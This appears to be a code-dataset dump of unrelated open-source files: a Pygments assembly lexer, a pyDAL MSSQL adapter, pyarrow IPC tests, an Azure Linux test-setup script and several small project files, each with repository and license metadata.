num = num / 1000
result = "%03d" % part + separator + result
return result.strip('0').strip(separator)
|
sysbot/pastedown
|
vendor/pygments/pygments/lexers/asm.py
|
Python
|
mit
| 12,130
| 0.001319
|
# -*- coding: utf-8 -*-
"""
pygments.lexers.asm
~~~~~~~~~~~~~~~~~~~
Lexers for assembly languages.
:copyright: Copyright 2006-2012 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, include, bygroups, using, DelegatingLexer
from pygments.lexers.compiled import DLexer, CppLexer, CLexer
from pygments.token import Text, Name, Number, String, Comment, Punctuation, \
Other, Keyword, Operator
__all__ = ['GasLexer', 'ObjdumpLexer','DObjdumpLexer', 'CppObjdumpLexer',
'CObjdumpLexer', 'LlvmLexer', 'NasmLexer']
class GasLexer(RegexLexer):
"""
For Gas (AT&T) assembly code.
"""
name = 'GAS'
aliases = ['gas']
filenames = ['*.s', '*.S']
mimetypes = ['text/x-gas']
#: optional Comment or Whitespace
string = r'"(\\"|[^"])*"'
char = r'[a-zA-Z$._0-9@-]'
identifier = r'(?:[a-zA-Z$_]' + char + '*|\.' + char + '+)'
number = r'(?:0[xX][a-zA-Z0-9]+|\d+)'
tokens = {
'root': [
include('whitespace'),
(identifier + ':', Name.Label),
(r'\.' + identifier, Name.Attribute, 'directive-args'),
(r'lock|rep(n?z)?|data\d+', Name.Attribute),
(identifier, Name.Function, 'instruction-args'),
(r'[\r\n]+', Text)
],
'directive-args': [
(identifier, Name.Constant),
(string, String),
('@' + identifier, Name.Attribute),
(number, Number.Integer),
(r'[\r\n]+', Text, '#pop'),
(r'#.*?$', Comment, '#pop'),
include('punctuation'),
include('whitespace')
],
'instruction-args': [
# For objdump-disassembled code, shouldn't occur in
# actual assembler input
('([a-z0-9]+)( )(<)('+identifier+')(>)',
bygroups(Number.Hex, Text, Punctuation, Name.Constant,
Punctuation)),
('([a-z0-9]+)( )(<)('+identifier+')([-+])('+number+')(>)',
bygroups(Number.Hex, Text, Punctuation, Name.Constant,
Punctuation, Number.Integer, Punctuation)),
# Address constants
(identifier, Name.Constant),
(number, Number.Integer),
# Registers
('%' + identifier, Name.Variable),
# Numeric constants
('$'+number, Number.Integer),
(r"$'(.|\\')'", String.Char),
(r'[\r\n]+', Text, '#pop'),
(r'#.*?$', Comment, '#pop'),
include('punctuation'),
include('whitespace')
],
'whitespace': [
(r'\n', Text),
(r'\s+', Text),
(r'#.*?\n', Comment)
],
'punctuation': [
(r'[-*,.():]+', Punctuation)
]
}
def analyse_text(text):
if re.match(r'^\.(text|data|section)', text, re.M):
return True
elif re.match(r'^\.\w+', text, re.M):
return 0.1
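# Illustrative usage sketch (not part of this module): any of these lexers can
# be fed to the standard pygments pipeline, e.g.
#
#   from pygments import highlight
#   from pygments.formatters import HtmlFormatter
#   html = highlight('.text\nmain:\n\tmovl %eax, %ebx\n', GasLexer(), HtmlFormatter())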
class ObjdumpLexer(RegexLexer):
"""
For the output of 'objdump -dr'
"""
name = 'objdump'
aliases = ['objdump']
filenames = ['*.objdump']
mimetypes = ['text/x-objdump']
hex = r'[0-9A-Za-z]'
tokens = {
'root': [
# File name & format:
('(.*?)(:)( +file format )(.*?)$',
bygroups(Name.Label, Punctuation, Text, String)),
# Section header
('(Disassembly of section )(.*?)(:)$',
bygroups(Text, Name.Label, Punctuation)),
# Function labels
# (With offset)
('('+hex+'+)( )(<)(.*?)([-+])(0[xX][A-Za-z0-9]+)(>:)$',
bygroups(Number.Hex, Text, Punctuation, Name.Function,
Punctuation, Number.Hex, Punctuation)),
# (Without offset)
('('+hex+'+)( )(<)(.*?)(>:)$',
bygroups(Number.Hex, Text, Punctuation, Name.Function,
Punctuation)),
# Code line with disassembled instructions
('( *)('+hex+r'+:)(\t)((?:'+hex+hex+' )+)( *\t)([a-zA-Z].*?)$',
bygroups(Text, Name.Label, Text, Number.Hex, Text,
using(GasLexer))),
# Code line with ascii
('( *)('+hex+r'+:)(\t)((?:'+hex+hex+' )+)( *)(.*?)$',
bygroups(Text, Name.Label, Text, Number.Hex, Text, String)),
# Continued code line, only raw opcodes without disassembled
# instruction
('( *)('+hex+r'+:)(\t)((?:'+hex+hex+' )+)$',
bygroups(Text, Name.Label, Text, Number.Hex)),
# Skipped a few bytes
(r'\t\.\.\.$', Text),
# Relocation line
# (With offset)
(r'(\t\t\t)('+hex+r'+:)( )([^\t]+)(\t)(.*?)([-+])(0x' + hex + '+)$',
bygroups(Text, Name.Label, Text, Name.Property, Text,
Name.Constant, Punctuation, Number.Hex)),
# (Without offset)
(r'(\t\t\t)('+hex+r'+:)( )([^\t]+)(\t)(.*?)$',
bygroups(Text, Name.Label, Text, Name.Property, Text,
Name.Constant)),
            (r'[^\n]+\n', Other)
|
]
}
class DObjdumpLexer(DelegatingLexer):
"""
For the output of 'objdump -Sr on compiled D files'
"""
name = 'd-objdump'
aliases = ['d-objdump']
filenames = ['*.d-objdump']
mimetypes = ['text/x-d-objdump']
def __init__(self, **options):
super(DObjdumpLexer, self).__init__(DLexer, ObjdumpLexer, **options)
class CppObjdumpLexer(DelegatingLexer):
"""
For the output of 'objdump -Sr on compiled C++ files'
"""
name = 'cpp-objdump'
aliases = ['cpp-objdump', 'c++-objdumb', 'cxx-objdump']
filenames = ['*.cpp-objdump', '*.c++-objdump', '*.cxx-objdump']
mimetypes = ['text/x-cpp-objdump']
def __init__(self, **options):
super(CppObjdumpLexer, self).__init__(CppLexer, ObjdumpLexer, **options)
class CObjdumpLexer(DelegatingLexer):
"""
For the output of 'objdump -Sr on compiled C files'
"""
name = 'c-objdump'
aliases = ['c-objdump']
filenames = ['*.c-objdump']
mimetypes = ['text/x-c-objdump']
def __init__(self, **options):
super(CObjdumpLexer, self).__init__(CLexer, ObjdumpLexer, **options)
class LlvmLexer(RegexLexer):
"""
For LLVM assembly code.
"""
name = 'LLVM'
aliases = ['llvm']
filenames = ['*.ll']
mimetypes = ['text/x-llvm']
#: optional Comment or Whitespace
string = r'"[^"]*?"'
identifier = r'([-a-zA-Z$._][-a-zA-Z$._0-9]*|' + string + ')'
tokens = {
'root': [
include('whitespace'),
# Before keywords, because keywords are valid label names :(...
(identifier + '\s*:', Name.Label),
include('keyword'),
(r'%' + identifier, Name.Variable),#Name.Identifier.Local),
(r'@' + identifier, Name.Variable.Global),#Name.Identifier.Global),
(r'%\d+', Name.Variable.Anonymous),#Name.Identifier.Anonymous),
(r'@\d+', Name.Variable.Global),#Name.Identifier.Anonymous),
(r'!' + identifier, Name.Variable),
(r'!\d+', Name.Variable.Anonymous),
(r'c?' + string, String),
(r'0[xX][a-fA-F0-9]+', Number),
(r'-?\d+(?:[.]\d+)?(?:[eE][-+]?\d+(?:[.]\d+)?)?', Number),
(r'[=<>{}\[\]()*.,!]|x\b', Punctuation)
],
'whitespace': [
(r'(\n|\s)+', Text),
(r';.*?\n', Comment)
],
'keyword': [
# Regular keywords
(r'(begin|end'
r'|true|false'
r'|declare|define'
r'|global|constant'
r'|private|linker_private|internal|available_externally|linkonce'
r'|linkonce_odr|weak|weak_odr|appending|dllimport|dllexport'
r'|common|default|hidden|protected|extern_weak|external'
r'|thread_local|zeroinitializer|undef|null|to|tail|target|triple'
r'|deplibs|datalayout|volatile|nuw|nsw|exact|inboun
|
stephenrauch/pydal
|
pydal/adapters/mssql.py
|
Python
|
bsd-3-clause
| 6,306
| 0.00111
|
import re
from .._compat import PY2, iteritems, integer_types, to_unicode
from .._globals import IDENTITY
from .base import SQLAdapter
from . import adapters, with_connection_or_raise
long = integer_types[-1]
class Slicer(object):
def rowslice(self, rows, minimum=0, maximum=None):
if maximum is None:
return rows[minimum:]
return rows[minimum:maximum]
class MSSQL(SQLAdapter):
dbengine = 'mssql'
drivers = ('pyodbc',)
REGEX_DSN = re.compile('^(?P<dsn>.+)$')
REGEX_URI = re.compile(
'^(?P<user>[^:@]+)(\:(?P<password>[^@]*))?@(?P<host>\[[^/]+\]|' +
'[^\:/]+)(\:(?P<port>[0-9]+))?/(?P<db>[^\?]+)(\?(?P<urlargs>.*))?$')
REGEX_ARGPATTERN = re.compile('(?P<argkey>[^=]+)=(?P<argvalue>[^&]*)')
def __init__(self, db, uri, pool_size=0, folder=None, db_codec='UTF-8',
credential_decoder=IDENTITY, driver_args={},
adapter_args={}, do_connect=True, srid=4326,
after_connection=None):
self.srid = srid
super(MSSQL, self).__init__(
db, uri, pool_size, folder, db_codec, credential_decoder,
driver_args, adapter_args, do_connect, after_connection)
def _initialize_(self, do_connect):
super(MSSQL, self)._initialize_(do_connect)
ruri = self.uri.split('://', 1)[1]
if '@' not in ruri:
try:
m = self.REGEX_DSN.match(ruri)
if not m:
raise SyntaxError(
'Parsing uri string(%s) has no result' % self.uri)
dsn = m.group('dsn')
if not dsn:
raise SyntaxError('DSN required')
except SyntaxError as e:
self.db.logger.error('NdGpatch error')
raise e
self.cnxn = dsn
else:
            m = self.REGEX_URI.match(ruri)
            if not m:
                raise SyntaxError(
"Invalid URI string in DAL: %s" % self.uri)
user = self.credential_decoder(m.group('user'))
if not user:
raise SyntaxError('User required')
password = self.credential_decoder(m.group('password'))
if not password:
password = ''
host = m.group('host')
if not host:
raise SyntaxError('Host name required')
db = m.group('db')
if not db:
raise SyntaxError('Database name required')
port = m.group('port') or '1433'
# Parse the optional url name-value arg pairs after the '?'
# (in the form of arg1=value1&arg2=value2&...)
# (drivers like FreeTDS insist on uppercase parameter keys)
argsdict = {'DRIVER': '{SQL Server}'}
urlargs = m.group('urlargs') or ''
for argmatch in self.REGEX_ARGPATTERN.finditer(urlargs):
argsdict[str(argmatch.group('argkey')).upper()] = \
argmatch.group('argvalue')
urlargs = ';'.join([
'%s=%s' % (ak, av) for (ak, av) in iteritems(argsdict)])
self.cnxn = 'SERVER=%s;PORT=%s;DATABASE=%s;UID=%s;PWD=%s;%s' \
% (host, port, db, user, password, urlargs)
def connector(self):
return self.driver.connect(self.cnxn, **self.driver_args)
def lastrowid(self, table):
self.execute('SELECT SCOPE_IDENTITY();')
return long(self.cursor.fetchone()[0])
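# Illustrative URI shapes (values are made up) matching the REGEX_URI / REGEX_DSN
# patterns parsed in _initialize_ above:
#
#   'mssql://user:secret@dbhost:1433/mydb?DRIVER={SQL Server}'   # user@host form
#   'mssql://MyOdbcDsn'                                          # DSN form (no '@')
#
# A hypothetical pyDAL call would then look like:
#   from pydal import DAL
#   db = DAL('mssql://user:secret@dbhost:1433/mydb')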
@adapters.register_for('mssql')
class MSSQL1(MSSQL, Slicer):
pass
@adapters.register_for('mssql3')
class MSSQL3(MSSQL):
pass
@adapters.register_for('mssql4')
class MSSQL4(MSSQL):
pass
class MSSQLN(MSSQL):
def represent(self, obj, field_type):
rv = super(MSSQLN, self).represent(obj, field_type)
if field_type in ('string', 'text', 'json') and rv[:1] == "'":
rv = 'N' + rv
return rv
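    # Illustrative behaviour (not taken from the source, but follows from the
    # code above): quoted string literals gain an N prefix for Unicode, e.g.
    #   represent('foo', 'string')  ->  "N'foo'"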
@with_connection_or_raise
def execute(self, *args, **kwargs):
if PY2:
args = list(args)
args[0] = to_unicode(args[0])
return super(MSSQLN, self).execute(*args, **kwargs)
@adapters.register_for('mssqln', 'mssql2')
class MSSQL1N(MSSQLN, Slicer):
pass
@adapters.register_for('mssql3n')
class MSSQL3N(MSSQLN):
pass
@adapters.register_for('mssql4n')
class MSSQL4N(MSSQLN):
pass
@adapters.register_for('vertica')
class Vertica(MSSQL1):
def lastrowid(self, table):
self.execute('SELECT SCOPE_IDENTITY();')
return long(self.cursor.fetchone()[0])
@adapters.register_for('sybase')
class Sybase(MSSQL1):
dbengine = 'sybase'
def _initialize_(self, do_connect):
super(MSSQL, self)._initialize_(do_connect)
ruri = self.uri.split('://', 1)[1]
if '@' not in ruri:
try:
m = self.REGEX_DSN.match(ruri)
if not m:
raise SyntaxError(
'Parsing uri string(%s) has no result' % self.uri)
dsn = m.group('dsn')
if not dsn:
raise SyntaxError('DSN required')
except SyntaxError as e:
self.db.logger.error('NdGpatch error')
raise e
self.cnxn = dsn
else:
m = self.REGEX_URI.match(ruri)
if not m:
raise SyntaxError(
"Invalid URI string in DAL: %s" % self.uri)
user = self.credential_decoder(m.group('user'))
if not user:
raise SyntaxError('User required')
password = self.credential_decoder(m.group('password'))
if not password:
password = ''
host = m.group('host')
if not host:
raise SyntaxError('Host name required')
db = m.group('db')
if not db:
raise SyntaxError('Database name required')
port = m.group('port') or '1433'
self.dsn = 'sybase:host=%s:%s;dbname=%s' % (host, port, db)
self.driver_args.update(
user=self.credential_decoder(user),
passwd=self.credential_decoder(password))
def connector(self):
return self.driver.connect(self.dsn, **self.driver_args)
|
syci/partner-contact
|
partner_contact_job_position/__manifest__.py
|
Python
|
agpl-3.0
| 823
| 0
|
# Copyright 2014 Pedro M. Baeza <pedro.baeza@tecnativa.com>
# Copyright 2015 Antonio Espinosa <antonioea@antiun.com>
# Copyright 2015 Jairo Llopis <jairo.llopis@tecnativa.com>
# Copyright 2017 David Vidal <david.vidal@tecnativa.com>
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
{
"name": "Partner Job Position",
"summary": "Categorize job positions for contacts",
"version": "13.0.1.0.0",
"category": "Customer Relationship Management",
"website": "https://github.com/OCA/partner-con
|
tact",
"author": "Tecnativa, Odoo Community Association (OCA)",
"license": "AGPL-3",
"installable": True,
"depends": ["contacts"],
"data": [
"security/ir.model.access.csv",
"views/res_partner_job_position_view.xml",
"views/res_partner_view.xml",
],
}
|
dontnod/weblate
|
weblate/wladmin/migrations/0006_auto_20190926_1218.py
|
Python
|
gpl-3.0
| 1,322
| 0
|
# Generated by Django 2.2.5 on 2019-09-26 12:18
from django.db import migrations, models
import weblate.utils.backup
class Migration(migrations.Migration):
dependencies = [("wladmin", "0005_auto_20190926_1332")]
operations = [
migrations.AddField(
model_name="backupservice",
name="paperkey",
field=models.TextField(default=""),
preserve_default=False,
),
migrations.AddField(
|
model_name="backupservice",
name="passphrase",
field=models.CharField(
default=weblate.utils.backup.make_password, max_length=100
|
),
),
migrations.AlterField(
model_name="backuplog",
name="event",
field=models.CharField(
choices=[
("backup", "Backup performed"),
("prune", "Deleted the oldest backups"),
("init", "Repository initialization"),
],
max_length=100,
),
),
migrations.AlterField(
model_name="backupservice",
name="repository",
field=models.CharField(
default="", max_length=500, verbose_name="Backup repository"
),
),
]
|
Winawer/exercism
|
python/house/house.py
|
Python
|
cc0-1.0
| 886
| 0.022573
|
parts = (('house', 'Jack built'),
('malt', 'lay in'),
('rat', 'ate'),
('cat', 'killed'),
('dog', 'worried'),
('cow with the crumpled horn', 'tossed'),
('maiden all forlorn', 'milked'),
('man all tattered and torn', 'kissed'),
('priest all shaven and shorn', 'married'),
('rooster that crowed in the morn', 'woke'),
|
('farmer sowing his corn', 'kept'),
('horse and the hound and the horn', 'belonged to'))
def verse(n):
return '{}\nthat {}'.format(parts[n][0],parts[n][1]) if n != 0 else '{} that {}'.format(parts[n][0],parts[n][1])
def rhymes(v = 11):
if v == 0:
return verse(v)
else:
return verse(v) + ' the ' + rhymes(v-1)
def rhyme():
return '\n'.join([ 'This is the ' + rhymes(v) + '.\n' for v in range(12) ])[:-1]
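# Illustrative check (not in the original file): the recursion composes verses
# from the inside out, e.g.
#   rhymes(1)  ==  'malt\nthat lay in the house that Jack built'
#   rhyme()    starts with 'This is the house that Jack built.'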
|
krzyste/ud032
|
Lesson_2_Problem_Set/06-Processing_Patents/split_data.py
|
Python
|
agpl-3.0
| 1,803
| 0.004437
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# So, the problem is that the gigantic file is actually not a valid XML, because
# it has several root elements, and XML declarations.
# It is, as a matter of fact, a collection of many concatenated XML documents.
# So, one solution would be to split the file into separate documents,
# so that you can process the resulting files as valid XML documents.
import xml.etree.ElementTree as ET
PATENTS = 'patent.data'
def get_root(fname):
tree = ET.parse(fname)
return tree.getroot()
def split_file(filename):
# we want you to split the input file into separate files
# each containing a single patent.
# As a hint - each patent declaration starts with the same line that was causing the error
|
# The new files should be saved with filename in the following format:
# "{}-{}".format(filename, n) where n is a counter, starting from 0.
indexes = []
with open(PATENTS, "r") as f:
lines = f.readlines()
for i, line in enumerate(lines):
if "?xml" in line:
indexes.append(i)
for i, index in enumerate(indexes):
fname = "{}-{}".format(PATENTS, i)
f = open(fname, "w")
if index != indexes[-1]:
f.writelines(lines[index:indexes[i+1]])
else:
f.writelines(lines[index:])
f.close()
def test():
split_file(PATENTS)
for n in range(4):
try:
fname = "{}-{}".format(PATENTS, n)
f = open(fname, "r")
if not f.readline().startswith("<?xml"):
print "You have not split the file {} in the correct boundary!".format(fname)
f.close()
except:
print "Could not find file {}. Check if the filename is correct!".format(fname)
test()
|
ismangil/pjproject
|
tests/pjsua/scripts-sipp/uas-answer-183-without-to-tag.py
|
Python
|
gpl-2.0
| 138
| 0
|
# $Id$
#
import inc_const as const
PJSUA = ["--null-audio --max-calls=1 --no-tcp $SIPP_URI"]
PJSUA_EXPECTS = [[0, "Audio updated", ""]]
|
hackerspace-silesia/cebulany-manager
|
setup.py
|
Python
|
mit
| 495
| 0
|
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'requirements.txt')) as fp:
requires = fp.readlines()
setup(
name='cebulany manager',
version='0.0.4',
classifiers=[],
    author='Firemark',
author_email='marpiechula@gmail.com',
url='https://github.com/hackerspace-silesia/cebulany-manager',
packages=find_packages(),
install_requires=requires,
tests_require=requires,
)
|
wndias/bc.repository
|
plugin.video.superlistamilton/service.py
|
Python
|
gpl-2.0
| 837
| 0.001195
|
# -*- coding: utf-8 -*-
'''
Genesis Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
    You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import xbmc
xbmc.executebuiltin('RunPlugin(plugin://plugin.video.superlistamilton/?action=service)')
|
xhochy/arrow
|
python/pyarrow/tests/test_ipc.py
|
Python
|
apache-2.0
| 27,938
| 0
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from collections import UserList
import io
import pytest
import socket
import sys
import threading
import weakref
import numpy as np
import pyarrow as pa
from pyarrow.tests.util import changed_environ
try:
from pandas.testing import assert_frame_equal, assert_series_equal
import pandas as pd
except ImportError:
pass
# TODO(wesm): The IPC tests depend a lot on pandas currently, so all excluded
# when it is not installed
pytestmark = pytest.mark.pandas
class IpcFixture:
def __init__(self, sink_factory=lambda: io.BytesIO()):
self._sink_factory = sink_factory
self.sink = self.get_sink()
def get_sink(self):
return self._sink_factory()
def get_source(self):
return self.sink.getvalue()
def write_batches(self, num_batches=5, as_table=False):
nrows = 5
df = pd.DataFrame({
'one': np.random.randn(nrows),
'two': ['foo', np.nan, 'bar', 'bazbaz', 'qux']})
batch = pa.record_batch(df)
writer = self._get_writer(self.sink, batch.schema)
frames = []
batches = []
for i in range(num_batches):
unique_df = df.copy()
unique_df['one'] = np.random.randn(len(df))
batch = pa.record_batch(unique_df)
frames.append(unique_df)
batches.append(batch)
if as_table:
table = pa.Table.from_batches(batches)
writer.write_table(table)
else:
for batch in batches:
writer.write_batch(batch)
writer.close()
return frames, batches
class FileFormatFixture(IpcFixture):
def _get_writer(self, sink, schema):
return pa.ipc.new_file(sink, schema)
def _check_roundtrip(self, as_table=False):
_, batches = self.write_batches(as_table=as_table)
file_contents = pa.BufferReader(self.get_source())
reader = pa.ipc.open_file(file_contents)
assert reader.num_record_batches == len(batches)
for i, batch in enumerate(batches):
# it works. Must convert back to DataFrame
batch = reader.get_batch(i)
assert batches[i].equals(batch)
assert reader.schema.equals(batches[0].schema)
class StreamFormatFixture(IpcFixture):
# ARROW-6474, for testing writing old IPC protocol with 4-byte prefix
use_legacy_ipc_format = False
# ARROW-9395, for testing writing old metadata version
options = None
def _get_writer(self, sink, schema):
return pa.ipc.new_stream(
sink,
schema,
use_legacy_format=self.use_legacy_ipc_format,
options=self.options,
)
class MessageFixture(IpcFixture):
def _get_writer(self, sink, schema):
return pa.RecordBatchStreamWriter(sink, schema)
@pytest.fixture
def ipc_fixture():
return IpcFixture()
@pytest.fixture
def file_fixture():
return FileFormatFixture()
@pytest.fixture
def stream_fixture():
return StreamFormatFixture()
def test_empty_file():
buf = b''
with pytest.raises(pa.ArrowInvalid):
pa.ipc.open_file(pa.BufferReader(buf))
def test_file_simple_roundtrip(file_fixture):
file_fixture._check_roundtrip(as_table=False)
def test_file_write_table(file_fixture):
file_fixture._check_roundtrip(as_table=True)
@pytest.mark.parametrize("sink_factory", [
lambda: io.BytesIO(),
lambda: pa.BufferOutputStream()
])
def test_file_read_all(sink_factory):
fixture = FileFormatFixture(sink_factory)
_, batches = fixture.write_batches()
file_contents = pa.BufferReader(fixture.get_source())
reader = pa.ipc.open_file(file_contents)
result = reader.read_all()
expected = pa.Table.from_batches(batches)
assert result.equals(expected)
def test_open_file_from_buffer(file_fixture):
# ARROW-2859; APIs accept the buffer protocol
_, batches = file_fixture.write_batches()
source = file_fixture.get_source()
reader1 = pa.ipc.open_file(source)
reader2 = pa.ipc.open_file(pa.BufferReader(source))
reader3 = pa.RecordBatchFileReader(source)
result1 = reader1.read_all()
result2 = reader2.read_all()
result3 = reader3.read_all()
assert result1.equals(result2)
assert result1.equals(result3)
def test_file_read_pandas(file_fixture):
frames, _ = file_fixture.write_batches()
file_contents = pa.BufferReader(file_fixture.get_source())
reader = pa.ipc.open_file(file_contents)
result = reader.read_pandas()
expected = pd.concat(frames).reset_index(drop=True)
assert_frame_equal(result, expected)
@pytest.mark.skipif(sys.version_info < (3, 6),
reason="need Python 3.6")
def test_file_pathlib(file_fixture, tmpdir):
import pathlib
_, batches = file_fixture.write_batches()
source = file_fixture.get_source()
path = tmpdir.join('file.arrow').strpath
with open(path, 'wb') as f:
f.write(source)
t1 = pa.ipc.open_file(pathlib.Path(path)).read_all()
t2 = pa.ipc.open_file(pa.OSFile(path)).read_all()
assert t1.equals(t2)
def test_empty_stream():
buf = io.BytesIO(b'')
with pytest.raises(pa.ArrowInvalid):
pa.ipc.open_stream(buf)
def test_stream_categorical_roundtrip(stream_fixture):
df = pd.DataFrame({
'one': np.random.randn(5),
'two': pd.Categorical(['foo', np.nan, 'bar', 'foo', 'foo'],
categories=['foo', 'bar'],
ordered=True)
})
batch = pa.RecordBatch.from_pandas(df)
with stream_fixture._get_writer(stream_fixture.sink, batch.schema) as wr:
wr.write_batch(batch)
table = (pa.ipc.open_stream(pa.BufferReader(stream_fixture.get_source()))
.read_all())
assert_frame_equal(table.to_pandas(), df)
def test_open_stream_from_buffer(stream_fixture):
# ARROW-2859
_, batches = stream_fixture.write_batches()
source = stream_fixture.get_source()
reader1 = pa.ipc.open_stream(source)
reader2 = pa.ipc.open_stream(pa.BufferReader(source))
reader3 = pa.RecordBatchStreamReader(source)
result1 = reader1.read_all()
result2 = reader2.read_all()
result3 = reader3.read_all()
assert result1.equals(result2)
assert result1.equals(result3)
def test_stream_write_dispatch(stream_fixture):
# ARROW-1616
df = pd.DataFrame({
'one': np.random.randn(5),
'two': pd.Categorical(['foo', np.nan, 'bar', 'foo', 'foo'],
categories=['foo', 'bar'],
ordered=True)
})
table = pa.Table.from_pandas(df, preserve_index=False)
batch = pa.RecordBatch.from_pandas(df, preserve_index=False)
with stream_fixture._get_writer(stream_fixture.sink, table.schema) as wr:
wr.write(table)
wr.write(batch)
table = (pa.ipc.open_stream(pa.BufferReader(stream_fixture.get_source()))
.read_all())
assert_frame_equal(table.to_pandas(),
pd.concat([df, df], ignore_index=True))
def test_stream_write_table_batches(stream_fixture):
# ARROW-504
df = pd.DataFrame({
'one': np.random.randn(20),
})
b1 = pa.RecordBatch.from_pandas(df[:10], preserve_index=False)
b2 = pa.RecordBatch.from_pandas(df, preserve_index=False)
table = pa.Table.from_batches([b1, b2, b1])
w
|
Azure/azure-linux-automation
|
remote-scripts/SETUP-INSTALL-PACKAGES.py
|
Python
|
apache-2.0
| 22,500
| 0.014622
|
#!/usr/bin/python
from azuremodules import *
import sys
import shutil
import time
import re
import os
import linecache
import imp
import os.path
import zipfile
current_distro = "unknown"
distro_version = "unknown"
sudo_password = ""
startup_file = ""
rpm_links = {}
tar_link = {}
current_distro = "unknown"
packages_list_xml = "./packages.xml"
python_cmd="python"
waagent_cmd="waagent"
waagent_bin_path="/usr/sbin"
def set_variables_OS_dependent():
global current_distro
global distro_version
global startup_file
global python_cmd
global waagent_cmd
global waagent_bin_path
RunLog.info ("\nset_variables_OS_dependent ..")
[current_distro, distro_version] = DetectDistro()
if(current_distro == 'unknown'):
RunLog.error ("unknown distribution found, exiting")
ResultLog.info('ABORTED')
exit()
if(current_distro == "ubuntu" or current_distro == "debian"):
startup_file = '/etc/rc.local'
elif(current_distro == "centos" or current_distro == "rhel" or current_distro == "fedora" or current_distro == "Oracle"):
startup_file = '/etc/rc.d/rc.local'
elif(current_distro == "SUSE" or "sles" in current_distro or current_distro == "opensuse"):
startup_file = '/etc/rc.d/after.local'
if(current_distro == "coreos"):
python_cmd="/usr/share/oem/python/bin/python"
waagent_bin_path="/usr/share/oem/bin/python"
waagent_cmd= "{0} {1}".format(python_cmd, waagent_bin_path)
Run("echo 'checking python version' >> PackageStatus.txt")
retcode, output = RunGetOutput('{0} --version | grep Python'.format(waagent_cmd))
if retcode == 0 and 'Python: 3.' in output:
python_cmd = 'python3'
Run("echo 'using [{0}]' >> PackageStatus.txt".format(python_cmd))
RunLog.info ("\nset_variables_OS_dependent ..[done]")
def download_and_install_rpm(package):
RunLog.info("Installing Package: " + package+" from rpmlink")
if package in rpm_links:
if DownloadUrl(rpm_links.get(package), "/tmp/"):
if InstallRpm("/tmp/"+re.split("/",rpm_links.get(package))[-1], package):
RunLog.info("Installing Package: " + package+" from rpmlink done!")
return True
RunLog.error("Installing Package: " + package+" from rpmlink failed!!")
return False
def easy_install(package):
RunLog.info("Installing Package: " + package+" via easy_install")
temp = Run("command -v easy_install")
if not ("easy_install" in temp):
install_ez_setup()
if package == "python-crypto":
output = Run("easy_install pycrypto")
return ("Finished" in output)
if package == "python-paramiko":
output = Run("easy_install paramiko")
return ("Finished" in output)
RunLog.error("Installing Package: " + package+" via easy_install failed!!")
return False
def yum_package_install(package):
if(YumPackageInstall(package) == True):
return True
elif(download_and_install_rpm(package) == True):
return True
elif(easy_install(package) == True):
|
return True
else:
return False
def zypper_package_install(package):
if(ZypperPackageInstall(package) == True):
return True
elif(download_and_install_rpm(package) == True):
return True
elif(package == 'gcc'):
return InstallGcc()
else:
return False
def coreos_package_install():
binpath="/usr/share/oem/bin"
pythonlibrary="/usr/share/oem/python/lib64/pyth
|
on2.7"
# create /etc/hosts
ExecMultiCmdsLocalSudo(["touch /etc/hosts",\
"echo '127.0.0.1 localhost' > /etc/hosts",\
"echo '** modify /etc/hosts successfully **' >> PackageStatus.txt"])
# copy tools to bin folder
Run("unzip -d CoreosPreparationTools ./CoreosPreparationTools.zip")
ExecMultiCmdsLocalSudo(["cp ./CoreosPreparationTools/killall " + binpath, \
"cp ./CoreosPreparationTools/iperf " + binpath,\
"cp ./CoreosPreparationTools/iozone " + binpath,\
"cp ./CoreosPreparationTools/dos2unix " + binpath,\
"cp ./CoreosPreparationTools/at " + binpath,\
"chmod 755 "+ binpath + "/*",\
"echo '** copy tools successfully **' >> PackageStatus.txt"])
# copy python library to python library folder
Run("tar zxvf ./CoreosPreparationTools/pycrypto.tar.gz -C "+ pythonlibrary)
ExecMultiCmdsLocalSudo(["tar zxvf ./CoreosPreparationTools/ecdsa-0.13.tar.gz -C ./CoreosPreparationTools",\
"cd ./CoreosPreparationTools/ecdsa-0.13",\
"/usr/share/oem/python/bin/python setup.py install",\
"cd ../.."])
ExecMultiCmdsLocalSudo(["tar zxvf ./CoreosPreparationTools/paramiko-1.15.1.tar.gz -C ./CoreosPreparationTools",\
"cd ./CoreosPreparationTools/paramiko-1.15.1",\
"/usr/share/oem/python/bin/python setup.py install",\
"cd ../..",\
"tar zxvf ./CoreosPreparationTools/pexpect-3.3.tar.gz -C ./CoreosPreparationTools",\
"cd ./CoreosPreparationTools/pexpect-3.3",\
"/usr/share/oem/python/bin/python setup.py install",\
"cd ../.."])
ExecMultiCmdsLocalSudo(["tar zxvf ./CoreosPreparationTools/dnspython-1.12.0.tar.gz -C ./CoreosPreparationTools",\
"cd ./CoreosPreparationTools/dnspython-1.12.0",\
"/usr/share/oem/python/bin/python setup.py install",\
"cd ../.."])
if not os.path.exists (pythonlibrary + "/site-packages/pexpect"):
RunLog.error ("pexpect package installation failed!")
Run("echo '** pexpect package installation failed **' >> PackageStatus.txt")
return False
if not os.path.exists (pythonlibrary + "/site-packages/paramiko"):
RunLog.error ("paramiko packages installation failed!")
Run("echo '** paramiko packages installed failed **' >> PackageStatus.txt")
return False
if not os.path.exists (pythonlibrary + "/site-packages/dns"):
RunLog.error ("dnspython packages installation failed!")
